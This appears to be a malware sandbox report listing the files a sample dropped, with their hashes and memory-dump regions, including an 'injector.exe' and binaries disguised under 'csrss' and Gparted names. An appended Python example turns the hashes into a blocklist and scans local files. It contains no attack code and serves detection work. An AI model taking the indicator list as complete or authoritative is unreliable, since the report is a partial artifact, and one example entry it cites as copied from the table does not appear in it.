C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10eb606bd1d021d.exe

MD5 99471e8043cb5f141962e1cfe12d44f4
SHA1 57c6baf415f892dfa82c206c1380a34130dad19d
SHA256 1946616cacfd8688bb722a2b1a6a0df117f9d8d877c675704602c2e8301dd509
SHA512 a31de569cf29efa20fad89a43ac55e6f93562d2204158d1d48f4c05f047fc59a6869a90a42184442e88d3b0d611e74c82d420eaccf9cfa08c6d4227c568baf41

memory/4100-109-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4100-108-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4100-106-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/4100-102-0x0000000000400000-0x000000000051C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10799545d143108.exe

MD5 6bddb7edd2648c177e0ef423cc7df23f
SHA1 d83a67835d694dc9d2726794e9c0a1d10bb1c06a
SHA256 af86823aa88c173cb727965d8a7a7d336c4d47e8d4286e0c22e2f2b7ef314e35
SHA512 761e1bd36d6ad0ff68f53784e34a3a34d936e1ec670a7a3692ad20d3bfde20484a593ababf1559ed85590b2481eaba4849b15022c6c0586dbe30237790f4a20a

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1001440e7e09.exe

MD5 a66e417ccbb28f68b13711bcfc2c4f9f
SHA1 d0076ec3fd9c50816e3385f1d4ce6231411a2f19
SHA256 91bc4939340bf81d9a1c4e8d5b58717691070e67f2a802fe8b6e5f6f6af39f59
SHA512 215779aa9782dc3568b3463967bab83629c1b84d0fec319f25ec98c8c51e460ad74bcd0261f80690c116139e20b9ff12a8a30777e372fe5eefc770dd35fe0f32

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed103b2f384c2a.exe

MD5 5d436a862c018c54ce2427968c556325
SHA1 97d03f2ed1c32b1de5467414a1c2fea6eb86404a
SHA256 060b9cbca548f4fbd738d79b735852476783b7bce3b373ec620b31fb9f8e39dc
SHA512 2c16938ca1a944b36f944d74ffdb5f6ec4c5f8a49688d6746d966cafcd55287b2794b010875bc3868b3a8e7a587b0160ee564244e98b61e8a59b978954b2ba78

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed101f2195049.exe

MD5 5eec35ae4619a7992130f13f66b03002
SHA1 47141ead2a1166234970c3dba5821cee57ddbb4d
SHA256 947efb32f120d30758ff6801dd1118922cff317411e87906aa9153fe928b1156
SHA512 5f8ae8110b7aa626cf1002f1f214ccc2fd09956cb9d2d82d31115adee356ffd529d1eef4f32a2f193fd862029f930ad01f068b22335d61a00ae5b25106c0590a

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed109189c07b.exe

MD5 5b3913c5aaf3e1a91ca73679603ec70b
SHA1 1df5b353c591b14989fae254fb47a529aadd3338
SHA256 8e554195273cc328d37d7e255cbaac6589eb44d596e6e2fea6d3766bf2908d7b
SHA512 c90d8d68591478d095ce86ae5c0c4f654023937d31c35390d3c622ecd2e8c4b9a5b3598cfe49419c094afcb699b95f489016b39799db4949d976d814a05efae3

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed106168c8ce90b57b8.exe

MD5 c7cd0def6982f7b281c6a61d29eec4be
SHA1 f9f600d70d60cf79563e84cec0b883fa3f541690
SHA256 b2525fcbe771148a6c9b9db5786b8ab833391684eb1ac6152e0a311b2a7f3ab9
SHA512 370c2bde411f188575177ca0821e5920496220785a6aac2e40b2a8d4a0f3151b5bca5e6e90688ba02780bbe1ea0bc1894588b10ff24e2c510254e38c0355b13b

C:\Users\Admin\AppData\Local\Temp\is-MDNR8.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/3988-166-0x0000000000E00000-0x0000000000E06000-memory.dmp

memory/932-169-0x0000000006310000-0x000000000632E000-memory.dmp

memory/2880-178-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2836-179-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-3ITUN.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/932-177-0x0000000006850000-0x000000000689C000-memory.dmp

memory/4608-174-0x0000000000400000-0x0000000000414000-memory.dmp

memory/3388-192-0x0000000000400000-0x000000000042C000-memory.dmp

memory/932-194-0x0000000070540000-0x000000007058C000-memory.dmp

memory/932-193-0x00000000072C0000-0x00000000072F2000-memory.dmp

memory/932-204-0x00000000068F0000-0x000000000690E000-memory.dmp

memory/932-205-0x0000000007310000-0x00000000073B3000-memory.dmp

memory/4996-206-0x0000000070540000-0x000000007058C000-memory.dmp

memory/932-216-0x0000000007D40000-0x00000000083BA000-memory.dmp

memory/932-217-0x0000000007440000-0x000000000745A000-memory.dmp

memory/932-218-0x00000000076D0000-0x00000000076DA000-memory.dmp

memory/932-219-0x00000000078C0000-0x0000000007956000-memory.dmp

memory/932-220-0x0000000007850000-0x0000000007861000-memory.dmp

memory/932-221-0x0000000007880000-0x000000000788E000-memory.dmp

memory/932-222-0x0000000007890000-0x00000000078A4000-memory.dmp

memory/932-223-0x0000000007990000-0x00000000079AA000-memory.dmp

memory/932-224-0x0000000007970000-0x0000000007978000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

memory/3644-230-0x0000000000400000-0x0000000000CBD000-memory.dmp

memory/1168-235-0x0000000000400000-0x0000000000CBD000-memory.dmp

memory/2840-236-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/2592-237-0x0000000000400000-0x000000000071A000-memory.dmp

memory/4608-238-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4708-239-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1252-240-0x0000000000400000-0x0000000000CBD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Program Files (x86)\Gparted\Build.sfx.exe

MD5 e2a5322cf4256f572d4fd54cff0d29eb
SHA1 a6b8724f93aa2ca36ca45f9299ed7fc9fc225b15
SHA256 d0dd207d349892382ffb6210182688c051a6cb5be0231da098d78c4cf4c56563
SHA512 a100c2e509d3f16d008de419c8195f7e3c713f86275c9e9f3b52e3fd0ff1e209ba8b15339c41a198a84a6b66ab3d503dfcfd58fb9dbd48eb39b3508323a23f51

C:\Program Files (x86)\Gparted\Build.exe

MD5 c874508845d1c0bb486f5e41af8de480
SHA1 3ac7e246934ba74c1018d50138bea77b035d6f90
SHA256 4793a9e954f00007a2f352648cddbc30add3ff4b7f22c3e1500d3671b0eb36be
SHA512 80daa52fea184748c4b858af4c7a676dddddf4c3cfdfada44917abddb0495ab22a9728800ea7f408fb3e66c269eda9df2462a9f82cf6a57c254d6c233c46f758

memory/4328-272-0x0000000000CB0000-0x0000000000CD2000-memory.dmp

memory/4328-273-0x0000000002EF0000-0x0000000002EF8000-memory.dmp

memory/2728-275-0x00000000057A0000-0x0000000005AF4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bad860750c12390a8ab743c440804aaf
SHA1 7ca89cefe6e8ead4d5e458626613b0fdd65dff13
SHA256 f654829db0a97d68b279c6463884d15173bd2bb885222a0a696d3472f61e79ad
SHA512 c79c9188d71f810717ad8b33e90e6fcd9e7051428adf55e582ad5c408606e9108891e4fb7494757ee664161f1fa19b48fdab9aa1e284fdfe8869f0e206e672f7

memory/2728-286-0x0000000005E90000-0x0000000005EDC000-memory.dmp

memory/2728-288-0x0000000006F20000-0x0000000006F42000-memory.dmp

memory/2728-289-0x0000000007650000-0x0000000007BF4000-memory.dmp

memory/2592-290-0x0000000000400000-0x000000000071A000-memory.dmp

C:\Program Files (x86)\Gparted\gimagex.exe

MD5 85199ea4a530756b743ad4491ea84a44
SHA1 0842cd749986d65d400a9605d17d2ed7a59c13cc
SHA256 3ea24d7899169c28d505233e13b9c92b51cd1181be299487392700d29e13b9aa
SHA512 b82b1c0ba24fa3e4c1f5309eee4cc6be0dfcc20f64886a40e4eb35d804f36af864b3e4218d7f27f439fa45659af0d69410798c9b3d1e5cab5a259759b7ad1f99

memory/2592-297-0x0000000000400000-0x000000000071A000-memory.dmp

memory/2840-298-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d9f327d549f33d66ea17259b211483e3
SHA1 6b6b966652150b0136acfb960a641949a0798fcb
SHA256 be0d99869ce40d1f9d2937f2a49d33d43b869138883309577cb5fb349b8993c6
SHA512 068e7a1ed132f8dc2e771a7b5dee018c0b41338729cffb61f29d7c2713f32bc961c90c2a54e13b5abb04dd9152370c8b47fb716d4bde539dee3c642cbc9adeaa

memory/1992-310-0x00000000061C0000-0x000000000620C000-memory.dmp

memory/1252-311-0x0000000000400000-0x0000000000CBD000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ca158fed3e2c702d8eb019f431320a4f
SHA1 46e92c9f260ea39d4f6296fa1fd3026315580c9f
SHA256 c09acfe11f4c7874bdb6486015be34ceb485f60496443e27f2791f536f83cdc5
SHA512 c1b57e0d7e605a0cd83b53f5f02024f3d3fcb51a664308d04ed6986753d3770d3a93945c1d0b0230d1dde79ccb7fcf960672fb6c2c81520cc7b55da387af82cb

memory/1252-326-0x0000000000400000-0x0000000000CBD000-memory.dmp

memory/1252-329-0x0000000000400000-0x0000000000CBD000-memory.dmp

memory/1252-332-0x0000000000400000-0x0000000000CBD000-memory.dmp

memory/1252-335-0x0000000000400000-0x0000000000CBD000-memory.dmp

memory/1252-338-0x0000000000400000-0x0000000000CBD000-memory.dmp

memory/1252-341-0x0000000000400000-0x0000000000CBD000-memory.dmp

memory/1252-344-0x0000000000400000-0x0000000000CBD000-memory.dmp

memory/1252-347-0x0000000000400000-0x0000000000CBD000-memory.dmp
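The Files entries above follow one layout (a path line, a blank line, then MD5/SHA1/SHA256/SHA512 lines) with `memory/<pid>-<n>-0x<start>-0x<end>-memory.dmp` entries interleaved. As an added example (not part of the sandbox report), the Python below parses that layout into a hash blocklist that can be swept against local files, and groups the memory dumps by process and region so repeated dumps of one region are counted rather than mistaken for distinct payloads. It assumes that layout exactly; the sample is two dropped files and four dump entries copied from above, and the file used in the round-trip self-check is constructed on the spot.

```python
"""Parse the Files table into a hash blocklist and per-process dump regions.

Added example, not part of the sandbox report. Assumes the page's layout:
a path line, a blank line, then MD5/SHA1/SHA256/SHA512 lines, with
'memory/<pid>-<n>-0x<start>-0x<end>-memory.dmp' entries interleaved.
"""
import hashlib
import os
import re
import tempfile
from collections import defaultdict

# Constructed sample: two dropped files and four dump entries copied from above.
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 532d84cb3e0928c7bedc0a89611837da
SHA1 b7dec859275a299e9c95833be01b055b2f9b91d7
SHA256 9aca2b6f263e24f8161def69b0e8a3a8dbc60bf46ee75714531e7ca09e4e9616
SHA512 c80f46401569b3c20eeeb7225f688e99dc94a70a8caf7200141069c3b43c8df7d4b9846174a22e05a50bd775ebe7342f1f0774b3cf1213f3535ee936e7d85366

memory/2840-124-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

memory/1252-326-0x0000000000400000-0x0000000000CBD000-memory.dmp
memory/1252-329-0x0000000000400000-0x0000000000CBD000-memory.dmp
memory/1252-332-0x0000000000400000-0x0000000000CBD000-memory.dmp
"""

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-f]+)$")
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}


def parse_files_table(text):
    """Return (files, dumps). A digest of the wrong length raises, because a
    truncated hash would become an indicator that can never match anything."""
    files, dumps, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_RE.match(line)
        if m:
            pid, idx, start, end = m.groups()
            dumps.append({"pid": int(pid), "index": int(idx),
                          "start": int(start, 16), "end": int(end, 16)})
            current = None
            continue
        m = HASH_RE.match(line)
        if m:
            algo, digest = m.groups()
            if current is None:
                raise ValueError(f"digest without a preceding path: {line!r}")
            if len(digest) != DIGEST_LEN[algo]:
                raise ValueError(f"bad {algo} length for {current['path']}")
            current[algo.lower()] = digest
            continue
        current = {"path": line}  # anything else starts a new file entry
        files.append(current)
    return files, dumps


def blocklist(files, algo="sha256"):
    """digest -> path as seen in the sandbox, for one algorithm."""
    return {f[algo]: f["path"] for f in files if algo in f}


def dump_regions(dumps):
    """pid -> {(start, end): times dumped}. One region captured repeatedly is
    the same unpacking or injection stage seen again, not several payloads."""
    regions = defaultdict(lambda: defaultdict(int))
    for d in dumps:
        regions[d["pid"]][(d["start"], d["end"])] += 1
    return regions


def sha256_of(path, chunk=1 << 20):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def scan_paths(paths, bl):
    """[(local_path, digest, sandbox_path)] for every local file on the list."""
    hits = []
    for p in paths:
        try:
            digest = sha256_of(p)
        except OSError:
            continue  # unreadable or vanished: skip it, do not abort the sweep
        if digest in bl:
            hits.append((p, digest, bl[digest]))
    return hits


def roundtrip_check():
    """Self-check on a constructed file: listed digest found, missing file skipped."""
    data = b"constructed sample bytes, not malware"
    with tempfile.TemporaryDirectory() as d:
        p = os.path.join(d, "sample.bin")
        with open(p, "wb") as fh:
            fh.write(data)
        bl = {hashlib.sha256(data).hexdigest(): r"C:\constructed\sample.bin"}
        hits = scan_paths([p, os.path.join(d, "missing.bin")], bl)
    return len(hits) == 1 and hits[0][2] == r"C:\constructed\sample.bin"
```

On the full table, `dump_regions` shows PID 1252's 0x400000-0xCBD000 region dumped many times over; 0x400000 is the default image base of a 32-bit PE, so those dumps are the in-memory image of one process captured repeatedly, and the first of them is the one to carve and hash, not all of them.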